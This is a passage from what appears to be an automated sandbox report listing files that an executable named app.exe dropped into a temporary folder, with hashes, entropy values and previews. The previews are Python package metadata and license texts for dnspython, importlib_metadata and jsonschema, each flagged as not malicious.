                                                                                                                                                                                                          MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                          SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                          SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                          SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:pip.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\dnspython-2.2.1.dist-info\LICENSE

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1526
                                                                                                                                                                                                          Entropy (8bit):5.04933524233974
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:RICjmq6509iueAc4PR3qaw/e0sCb5/kos9+ncZPRnA+yF3ew:6CKtYiuDVtqn/etI5u+ni9AtF3ew
                                                                                                                                                                                                          MD5:5AF50906B5929837F667DFE31052BD34
                                                                                                                                                                                                          SHA1:66DB5E89FE8FE8E61165A511E71966E84B6B0102
                                                                                                                                                                                                          SHA-256:C3EA3FF5654B329C19D3BC5F7481AF623C3DDED4A6145585499F843AD3D741CD
                                                                                                                                                                                                          SHA-512:21648D28A0E86E18BA35A5CE313017F9A11888ECBA28EA113ACD198F58D61CAE866B98072AA466E2A18731A9888C5A14FC4D0CE295F0E24C86EE5D30CC099B14
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:ISC License..Copyright (C) Dnspython Contributors..Permission to use, copy, modify, and/or distribute this software for.any purpose with or without fee is hereby granted, provided that the.above copyright notice and this permission notice appear in all.copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL.WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE.AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL.DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR.PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER.TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR.PERFORMANCE OF THIS SOFTWARE.....Copyright (C) 2001-2017 Nominum, Inc..Copyright (C) Google Inc...Permission to use, copy, modify, and distribute this software and its.documentation for any purpose with or without fee is hereby granted,.provided that the above copyright notice and

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\dnspython-2.2.1.dist-info\METADATA

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4883
                                                                                                                                                                                                          Entropy (8bit):5.112610317572209
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:DKnajmPkK4A3EeYIpV48w1+Y0tswkGFXEPA6/Y7hh0HkYlUrNm:G4A3EeYIpV43wRsEFmA6/Qh0j
                                                                                                                                                                                                          MD5:600A3B4330D5C8EE0BCCED5699FD6F35
                                                                                                                                                                                                          SHA1:38409EB7B64F69D0D8B5CF2B45A60BD2932131B2
                                                                                                                                                                                                          SHA-256:A87C9AD9C6B8E7181845339040E9544520AB80E46332B7D50EC2AE90501D58AB
                                                                                                                                                                                                          SHA-512:F46A8F459B0F7AB3B18A07E4125A585AFBA3D5700884729642398A2FC1D2C2677ED612EF446DE54E31171C7A8D049833FB67C14ECFC01DC9FDD770D1281A13AE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Metadata-Version: 2.1.Name: dnspython.Version: 2.2.1.Summary: DNS toolkit.Home-page: https://www.dnspython.org.License: ISC.Author: Bob Halley.Author-email: halley@dnspython.org.Requires-Python: >=3.6,<4.0.Classifier: License :: OSI Approved.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.6.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Provides-Extra: curio.Provides-Extra: dnssec.Provides-Extra: doh.Provides-Extra: idna.Provides-Extra: trio.Provides-Extra: wmi.Requires-Dist: cryptography (>=2.6,<37.0); extra == "dnssec".Requires-Dist: curio (>=1.2,<2.0); extra == "curio".Requires-Dist: h2 (>=4.1.0); (python_full_version >= "3.6.2") and (extra == "doh").Requires-Dist: httpx (>=0.21.1); (python_full_version >= "3.6.2") and (extra == "doh").Requires-Dist: idna (>=2.1,<4.0); extra == "idna"

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\dnspython-2.2.1.dist-info\RECORD

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):17957
                                                                                                                                                                                                          Entropy (8bit):5.768816465057231
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:S2Dd8Q1nL7Hzxm86sdplWg0WmDVlsj5lLiJCFvl25kHhkZK0QJN3Tis41hPFr5pA:XOpTBycal23H0
                                                                                                                                                                                                          MD5:AB4F420F02C46F5DE635618A574B443A
                                                                                                                                                                                                          SHA1:1F527351E77259E142DBD68BA08A545D36145615
                                                                                                                                                                                                          SHA-256:15CCA66D051EA78066F55B9615E51DDD268BACF06E4D03FD86A04025D0D68CA5
                                                                                                                                                                                                          SHA-512:98B0DD99BEC6F4DE50F550176B59A5E03988C2D5B562C725EEA2EF50CCA19E7995D08E3A57885FA3FD076BDA8068353D58CF76FDE866243786DA1B39AEC894A5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:dns/__init__.py,sha256=Tnvxutf2E4hCu2RMU7ADmiVnqOikSWxgCcSJ9xuR-v4,1597..dns/__pycache__/__init__.cpython-38.pyc,,..dns/__pycache__/_asyncbackend.cpython-38.pyc,,..dns/__pycache__/_asyncio_backend.cpython-38.pyc,,..dns/__pycache__/_curio_backend.cpython-38.pyc,,..dns/__pycache__/_immutable_attr.cpython-38.pyc,,..dns/__pycache__/_immutable_ctx.cpython-38.pyc,,..dns/__pycache__/_trio_backend.cpython-38.pyc,,..dns/__pycache__/asyncbackend.cpython-38.pyc,,..dns/__pycache__/asyncquery.cpython-38.pyc,,..dns/__pycache__/asyncresolver.cpython-38.pyc,,..dns/__pycache__/dnssec.cpython-38.pyc,,..dns/__pycache__/e164.cpython-38.pyc,,..dns/__pycache__/edns.cpython-38.pyc,,..dns/__pycache__/entropy.cpython-38.pyc,,..dns/__pycache__/enum.cpython-38.pyc,,..dns/__pycache__/exception.cpython-38.pyc,,..dns/__pycache__/flags.cpython-38.pyc,,..dns/__pycache__/grange.cpython-38.pyc,,..dns/__pycache__/immutable.cpython-38.pyc,,..dns/__pycache__/inet.cpython-38.pyc,,..dns/__pycache__/ipv4.cpython-38.pyc,,..dn

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\dnspython-2.2.1.dist-info\WHEEL

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):83
                                                                                                                                                                                                          Entropy (8bit):4.608262817474207
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:RtEeXLR1hRIsP+tPCCfA5I:RtL1HRWBB3
                                                                                                                                                                                                          MD5:64322D7290E1BA514F9DE548E3F03673
                                                                                                                                                                                                          SHA1:0739047EEA2ADC0C72FA36135E17D2BDA3FB9E19
                                                                                                                                                                                                          SHA-256:0C0F3AFE1E10C30CC6791A33EB6A35B2F62DE641845E9A144EE4EDC33A136F7D
                                                                                                                                                                                                          SHA-512:635803514110CE492643B35869F65E5CE48821AED187D6F40030C31200EE865CF86D020BC0EE8653A33E0F5BC59A5DD1EAF9E8DFAFE53A91E165812566DA836D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Wheel-Version: 1.0.Generator: poetry 1.0.8.Root-Is-Purelib: true.Tag: py3-none-any.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\importlib_metadata-7.1.0.dist-info\INSTALLER

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4
                                                                                                                                                                                                          Entropy (8bit):1.5
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:Mn:M
                                                                                                                                                                                                          MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                          SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                          SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                          SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:pip.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\importlib_metadata-7.1.0.dist-info\LICENSE

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11358
                                                                                                                                                                                                          Entropy (8bit):4.4267168336581415
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEn7HbHR:U9vlKM1zJlFvmNz5VrlkTS07Ht
                                                                                                                                                                                                          MD5:3B83EF96387F14655FC854DDC3C6BD57
                                                                                                                                                                                                          SHA1:2B8B815229AA8A61E483FB4BA0588B8B6C491890
                                                                                                                                                                                                          SHA-256:CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
                                                                                                                                                                                                          SHA-512:98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\importlib_metadata-7.1.0.dist-info\METADATA

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4690
                                                                                                                                                                                                          Entropy (8bit):4.998942177281955
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:DxIZSaChm1gR9GDbHRoie7QdnzJGc+fFZpDN00x2jZ2SBXZJSwTE:DhmqfGDbHRoiOQdnlz+TP0vJHJSwTE
                                                                                                                                                                                                          MD5:C06F5342FD3F57A2307C4A0E67D3B41A
                                                                                                                                                                                                          SHA1:1A9C1A56A16E8B0975648FDCAD6983C6B04A3D3B
                                                                                                                                                                                                          SHA-256:138CF970A8F276EED118A6C6BE6F3BEAF1B72F185DE7939C5C3846A246BB76B4
                                                                                                                                                                                                          SHA-512:8FBEDC1F877EC956A81F08C717C1111C75C36F355D86BBE1B0577C66D4A79C80F155B85658FCCCC99A95CB71564EFE41CA65EB8682E2D0B603DBD20D04A21F5A
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Metadata-Version: 2.1.Name: importlib_metadata.Version: 7.1.0.Summary: Read metadata from Python packages.Home-page: https://github.com/python/importlib_metadata.Author: Jason R. Coombs.Author-email: jaraco@jaraco.com.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.License-File: LICENSE.Requires-Dist: zipp >=0.5.Requires-Dist: typing-extensions >=3.6.4 ; python_version < "3.8".Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'docs'.Provides-Extra: perf.Requires-Dist: ipython ; extra == 'perf'.Provi

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\importlib_metadata-7.1.0.dist-info\RECORD

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2254
                                                                                                                                                                                                          Entropy (8bit):5.62574569796933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:CnuXR29Cf5l/g57zXY0Xzeom9pvJq/fwJOfYrBfnJ/V4zN/3WJV:9XDngN5zeRDJsoIYrBfJ/6z9qV
                                                                                                                                                                                                          MD5:A9233E27857D02096B41E4C2D8C13775
                                                                                                                                                                                                          SHA1:C9A2948256D50B24B18FCB91FADBF43CFDA4058F
                                                                                                                                                                                                          SHA-256:C18572F8E48C6BBAF87B70D08408D7009B65B8576F36C38BA08F7B5C5DE1D5CF
                                                                                                                                                                                                          SHA-512:F8045879EC7EDF4F778BD081BDD587F0025CF9191820DCFD6959DEF4081D2EE794D8F23BF7D4E98E1E7C39049C4171938BED6DBF1AA42EAC923D5962552C906C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:importlib_metadata-7.1.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_metadata-7.1.0.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_metadata-7.1.0.dist-info/METADATA,sha256=E4z5cKjydu7RGKbGvm876vG3Lxhd55OcXDhGoka7drQ,4690..importlib_metadata-7.1.0.dist-info/RECORD,,..importlib_metadata-7.1.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..importlib_metadata-7.1.0.dist-info/top_level.txt,sha256=CO3fD9yylANiXkrMo4qHLV_mqXL2sC5JFKgt1yWAT-A,19..importlib_metadata/__init__.py,sha256=lAFrEbJHarqSCdkubZebZSDAe20ES_h-ZFqVyv4bn8Y,34302..importlib_metadata/__pycache__/__init__.cpython-38.pyc,,..importlib_metadata/__pycache__/_adapters.cpython-38.pyc,,..importlib_metadata/__pycache__/_collections.cpython-38.pyc,,..importlib_metadata/__pycache__/_compat.cpython-38.pyc,,..importlib_metadata/__pycache__/_functools.cpython-38.pyc,,..importlib_metadata/__pycache__/_itertools.cpython-38.pyc,,..importlib

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\importlib_metadata-7.1.0.dist-info\WHEEL

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):92
                                                                                                                                                                                                          Entropy (8bit):4.812622295095324
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                          MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                          SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                          SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                          SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\importlib_metadata-7.1.0.dist-info\top_level.txt

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19
                                                                                                                                                                                                          Entropy (8bit):3.536886723742169
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:JSej0EBERG:50o4G
                                                                                                                                                                                                          MD5:A24465F7850BA59507BF86D89165525C
                                                                                                                                                                                                          SHA1:4E61F9264DE74783B5924249BCFE1B06F178B9AD
                                                                                                                                                                                                          SHA-256:08EDDF0FDCB29403625E4ACCA38A872D5FE6A972F6B02E4914A82DD725804FE0
                                                                                                                                                                                                          SHA-512:ECF1F6B777970F5257BDDD353305447083008CEBD8E5A27C3D1DA9C7BDC3F9BF3ABD6881265906D6D5E11992653185C04A522F4DB5655FF75EEDB766F93D5D48
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:importlib_metadata.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\jsonschema-4.17.3.dist-info\INSTALLER

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4
                                                                                                                                                                                                          Entropy (8bit):1.5
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:Mn:M
                                                                                                                                                                                                          MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                          SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                          SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                          SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:pip.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\jsonschema-4.17.3.dist-info\METADATA

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7879
                                                                                                                                                                                                          Entropy (8bit):5.159665568881749
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:iFpsu6sMydbuUsPWb3Gjq+PgLoR6IZ+LkOcWtNzhbQId:iFpsBsFd0PWbWj/PgLoR6IZ+LkOcWtN/
                                                                                                                                                                                                          MD5:5B8DCB3164F7532B460A852AC7AD6625
                                                                                                                                                                                                          SHA1:B940C2B73F418A5E375C67E3EEECFD3EED509679
                                                                                                                                                                                                          SHA-256:6270C4B3E8FA4B802DFC5AB9E2EECFA9F606E20413F04E67AE9F2FBB63D7797C
                                                                                                                                                                                                          SHA-512:DD8A7D57955A6235AE70CD7DBE0F1B130AC5EFFE4ECD396FDB4CBE6F1B008F5FFE3C0BA3AF62AB3886AAAFAE2C1C7A60A929D0410BA64A667998A3D6D39B621A
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Metadata-Version: 2.1.Name: jsonschema.Version: 4.17.3.Summary: An implementation of JSON Schema validation for Python.Project-URL: Homepage, https://github.com/python-jsonschema/jsonschema.Project-URL: Documentation, https://python-jsonschema.readthedocs.io/.Project-URL: Issues, https://github.com/python-jsonschema/jsonschema/issues/.Project-URL: Funding, https://github.com/sponsors/Julian.Project-URL: Tidelift, https://tidelift.com/subscription/pkg/pypi-jsonschema?utm_source=pypi-jsonschema&utm_medium=referral&utm_campaign=pypi-link.Project-URL: Changelog, https://github.com/python-jsonschema/jsonschema/blob/main/CHANGELOG.rst.Project-URL: Source, https://github.com/python-jsonschema/jsonschema.Author: Julian Berman.Author-email: Julian+jsonschema@GrayVines.com.License: MIT.License-File: COPYING.Keywords: data validation,json,jsonschema,validation.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved ::

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\jsonschema-4.17.3.dist-info\RECORD

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):6544
                                                                                                                                                                                                          Entropy (8bit):5.678342858780333
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:sKXUWSTkxuR5a0KwOsfac4s7ivJvYdDZzQw9SGp4VjHJXRyVn4U1pkwsryTj7J:sKX58TK5sCc4s4JYQwgGp4QVd
                                                                                                                                                                                                          MD5:D0FD37948E7E4FCACEC42C2FC9789909
                                                                                                                                                                                                          SHA1:C90EEB80F7BC15549E5B9436B063972037CB1EA3
                                                                                                                                                                                                          SHA-256:409E0EF8F5612B42656CB1A974AACE38233BC7DEB9F8C533270E6416AA6EF0D1
                                                                                                                                                                                                          SHA-512:2798DFDB6966B5352E6C1EFD5D5143D6393577B319BF9A883D8FEA27C7C4C79648802F9B74B679FC023AD6A8DEF99EF3EC0D9BBBAF0042C51F45E19788DCC919
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:../../Scripts/jsonschema.exe,sha256=ydmRg4xKvTP36E3PoFjw6wAqqw6QNJqlroozp6J8-ys,107860..jsonschema-4.17.3.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..jsonschema-4.17.3.dist-info/METADATA,sha256=YnDEs-j6S4At_Fq54u7PqfYG4gQT8E5nrp8vu2PXeXw,7879..jsonschema-4.17.3.dist-info/RECORD,,..jsonschema-4.17.3.dist-info/WHEEL,sha256=NaLmgHHW_f9jTvv_wRh9vcK7c7EK9o5fwsIXMOzoGgM,87..jsonschema-4.17.3.dist-info/entry_points.txt,sha256=vO7rX4Fs_xIVJy2pnAtKgTSxfpnozAVQ0DjCmpMxnWE,51..jsonschema-4.17.3.dist-info/licenses/COPYING,sha256=T5KgFaE8TRoEC-8BiqE0MLTxvHO0Gxa7hGw0Z2bedDk,1057..jsonschema/__init__.py,sha256=FRdJDXN8-AFk-Fj1qclckQsZNeGQB__r_QuMjtRoze4,2187..jsonschema/__main__.py,sha256=Sfz1ZNeogymj_KZxq6JXY3F6O_1v28sLIiskusifQ5s,40..jsonschema/__pycache__/__init__.cpython-38.pyc,,..jsonschema/__pycache__/__main__.cpython-38.pyc,,..jsonschema/__pycache__/_format.cpython-38.pyc,,..jsonschema/__pycache__/_legacy_validators.cpython-38.pyc,,..jsonschema/__pycache__/_types.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\jsonschema-4.17.3.dist-info\WHEEL

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):87
                                                                                                                                                                                                          Entropy (8bit):4.6432018017663745
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:RtEeXAaCQvhP+tPCCfA5I:Rt2PQvhWBB3
                                                                                                                                                                                                          MD5:A1FF6DEE0A88BA5E61C8411AA9D78EB2
                                                                                                                                                                                                          SHA1:320108ABC127939DE69551A519CF9CBE73ED37FC
                                                                                                                                                                                                          SHA-256:35A2E68071D6FDFF634EFBFFC1187DBDC2BB73B10AF68E5FC2C21730ECE81A03
                                                                                                                                                                                                          SHA-512:514589FFE35191A80B168CCA962F0A2A22F3EB7E2F3BF40B417370E817E01C9C108DCAE28132B61DF92EA5A38456527379DAA747D62C1574EA52A58F1739D887
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Wheel-Version: 1.0.Generator: hatchling 1.11.1.Root-Is-Purelib: true.Tag: py3-none-any.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\jsonschema-4.17.3.dist-info\entry_points.txt

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):51
                                                                                                                                                                                                          Entropy (8bit):4.176725833393184
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:1PWQhEFYFPo8ELTi:1PHEFoPHELTi
                                                                                                                                                                                                          MD5:095614C840316FB033B6B246EBC5A437
                                                                                                                                                                                                          SHA1:EF93164BFFE5ED7A6AABC557DB6CAB721008E911
                                                                                                                                                                                                          SHA-256:BCEEEB5F816CFF1215272DA99C0B4A8134B17E99E8CC0550D038C29A93319D61
                                                                                                                                                                                                          SHA-512:BA38857A744185231613871953DD40152406B3F3BA3434694C2184BD6A3839094E93D56B189AEE1BD0C9F67DA22D84C3E706F16F9A794CDA3B9F759B590FF2D8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[console_scripts].jsonschema = jsonschema.cli:main.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\jsonschema-4.17.3.dist-info\licenses\COPYING

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1057
                                                                                                                                                                                                          Entropy (8bit):5.104212052457223
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:d3rmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:laJHlxE35QHOs5exm3ogF5n
                                                                                                                                                                                                          MD5:7A60A81C146EC25599A3E1DABB8610A8
                                                                                                                                                                                                          SHA1:2DE1A0A3674903238A664ACE5D3ACC66A7D546C7
                                                                                                                                                                                                          SHA-256:4F92A015A13C4D1A040BEF018AA13430B4F1BC73B41B16BB846C346766DE7439
                                                                                                                                                                                                          SHA-512:FBCCF0F7378F4A081A87CB26532E1F5BE599D781C958C85BFC8F7BBE356644A82826259F9871701E01E6232732E0B651E6171B8DE019DFE07B48F28CA017FD62
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Copyright (c) 2013 Julian Berman..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH TH

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI22282\libcrypto-1_1.dll

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
